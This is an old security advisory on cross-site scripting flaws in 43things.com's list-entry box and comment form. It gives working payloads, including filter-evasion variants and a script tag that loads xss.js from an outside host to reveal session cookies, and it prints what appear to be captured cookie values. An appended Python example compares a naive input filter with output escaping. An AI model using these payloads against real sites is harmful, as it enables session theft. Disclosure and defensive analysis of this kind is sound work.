43things.com - XSS with cookie disclosure
43things.com
Homepage:
http://www.43things.com
Affected files:
input box "I want to add to my list"
posting a comment
----------------------------------------
XSS vulnerability via the input text of the "I want to____" box, triggered
when you add an item that's already on your list.
For a PoC we use style tags with broken-up JavaScript. Put this item in your
list once, and then, using the "I want to:" box, put it in again:
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
Screenshots:
http://www.youfucktard.com/xsp/43things1.jpg
Now, in the same box, even with no filter evasion, we can also show our cookie.
Try putting:
<script src=http://www.youfucktard.com/xss.js></script>
And then, as above, put it in the same box a second time.
Our cookie:
"This is remote text via xss.js located at youfucktard.com
auth=7k5BtRfaYdbOdaaD%2BrHb8JGnJkroqKA2fR2Txs%2BO8BpvcxoRbeAe%2Bp3JZs2fhO7wu4IpF6ofcq1dROtVuHwTiQFkMV3U7pl%2FmcmA4ICJmLk%3D;
ubid=4G%2BZUgL4cQNV0JT1ixHx5obNSs0%3D;
_session_id=837ecebc52b1d47edd9c65e29a945de8;
AWSUSER_ID=awsuser_id1150241074938r6320;
AWSSESSION_ID=awssession_id1150241074938r6320"
Screenshots:
http://www.youfucktard.com/xsp/43things2.jpg
--------------------------------------
XSS via posting a comment.
Data here isn't properly sanitized before the page is generated. Even with no
filtering we can insert something like:
<IMG SRC=javascript:alert('XSS')>
and it will produce our XSS example.
Screenshots:
http://www.youfucktard.com/xsp/43things3.jpg
However, it won't actually insert the comment; it will just execute it. So to
bypass the "malformed html found" error message, we use the numeric character
references for < and >, along with double beginning and ending tags. For a
PoC, try putting the code below as a comment:
<<<IMG SRC=javascript:alert('We%20Bypassed%20the%20filter!')>>>
Screenshots:
http://www.youfucktard.com/xsp/43things4.jpg
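Added example (not from the advisory or the site): the fix for both issues is to encode user text on output rather than reject "malformed HTML" on input; the naive blocklist below is a hypothetical stand-in for such a rejection check and is shown beside the escaping approach using the advisory's own payloads as input.

```python
# Added example, not 43things.com code. Names are hypothetical.
import html
import re

# Payloads quoted in the advisory, used here only as test input. The last one
# is a constructed reading of the entity-wrapped comment payload.
SAMPLES = [
    '<STYLE>@im\\port\'\\ja\\vasc\\ript:alert("XSS")\';</STYLE>',
    '<script src=http://www.youfucktard.com/xss.js></script>',
    "<IMG SRC=javascript:alert('XSS')>",
    "&#60;&#60;&#60;IMG SRC=javascript:alert('x')&#62;&#62;&#62;",
]

# Looks for a raw tag opener in the submitted text only.
TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)


def naive_filter(text: str) -> bool:
    """Input-side check in the style of a 'malformed html found' rejection.
    Returns True when the raw text looks like it contains a tag. It never
    sees entity-encoded input, which is why such checks get bypassed."""
    return bool(TAG_RE.search(text))


def render_user_text(text: str) -> str:
    """Output encoding: <, >, &, ' and " all become entities, so the browser
    displays the text literally and never parses it as markup or a URL."""
    return html.escape(text, quote=True)


def is_inert(rendered: str) -> bool:
    """True if the rendered fragment contains no raw tag delimiters."""
    return "<" not in rendered and ">" not in rendered


if __name__ == "__main__":
    for s in SAMPLES:
        print(f"filter={naive_filter(s)!s:5} inert={is_inert(render_user_text(s))}")
```

Note that the entity-encoded sample passes the naive filter, while every sample is inert once escaped on output.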